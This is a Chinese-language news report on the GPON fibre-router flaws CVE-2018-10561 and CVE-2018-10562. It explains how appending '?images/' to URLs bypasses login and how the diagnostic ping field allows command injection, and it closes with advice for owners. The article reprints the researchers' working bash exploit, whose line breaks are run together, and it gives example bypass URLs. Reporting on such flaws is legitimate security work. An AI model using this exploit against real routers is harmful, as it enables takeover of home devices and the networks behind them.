你家裡的光貓”安全嗎?100萬家用“光貓”中發現嚴重的RCE漏洞

研究人員發現了一種繞過認證的方式來訪問GPON家庭路由器(CVE-2018-10561),也就是繞過了我們俗稱的“光貓”。專家們將這種身份驗證繞過漏洞與另一個命令注入漏洞(CVE-2018-10562)關聯在一起,就能夠在設備上執行命令。

你家裡的光貓”安全嗎?100萬家用“光貓”中發現嚴重的RCE漏洞

利用

專家們分析了GPON家用路由器的固件,發現兩個不同的嚴重漏洞(CVE-2018-10561和CVE-2018-10562)可以關聯在一起,以便完全控制易受攻擊的設備,從而控制網絡。第一個漏洞利用設備的身份驗證機制,攻擊者可以利用該漏洞繞過所有身份驗證。

該漏洞會影響HTTP服務器的構建,HTTP服務器會在進行身份驗證時檢查特定的路徑。這允許攻擊者使用簡單的技巧繞過任何端點上的身份驗證。

通過追加

?images/到URL

攻擊者可以繞過端點。

這適用於HTML頁面和GponForm/

例如,通過插入

/menu.html?images/或/GponForm/diag_FORM?images/

專家們能夠控制GPON 家用路由器。

在查看設備功能時,專家們注意到診斷端點包含ping和traceroute命令。使用主機參數就可以注入命令。

“由於路由器將ping結果保存在/ tmp並在用戶重訪/diag.html時將其發送給用戶,因此執行命令並通過身份驗證繞過漏洞獲取其輸出非常簡單。”VPNMentor(analysis)發佈的分析結果。

專家發佈以下bash版本的漏洞利用代碼:

#!/bin/bashecho "[+] Sending the Command... "curl -k -d "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=\`$2\`;$2&ipv=0" $1/GponForm/diag_Form?images/ 2>/dev/null 1>/dev/nullecho "[+] Waiting...."sleep 3echo "[+] Retrieving the ouput...."curl -k $1/diag.html?images/ 2>/dev/null | grep 'diag_result = ' | sed -e 's/\\n/\n/g'

“用兩種模式反向(`)和分號(;)發送命令,因為不同的模型在不同的設備上觸發”。

GPON是一種非常流行的使用光纖的無源光網絡設備,這些設備由ISP(網絡運營商)提供。據不完全統計,有超過100萬人在使用這種類型的網絡路由器。

專家們總結表示,

我們在很多隨機的GPON路由器上測試了這個漏洞,並發現在這些設備上均存在此漏洞。因為很多人使用這些類型的路由器,所以這個漏洞很有可能會導致整個網絡的淪陷。

建議

1.檢查您的路由器是否使用GPON網絡。

2.請注意,GPON路由器可能會被黑客利用。

3.與ISP溝通,瞭解他們可以採取哪些措施來修復該漏洞。


分享到:


相關文章: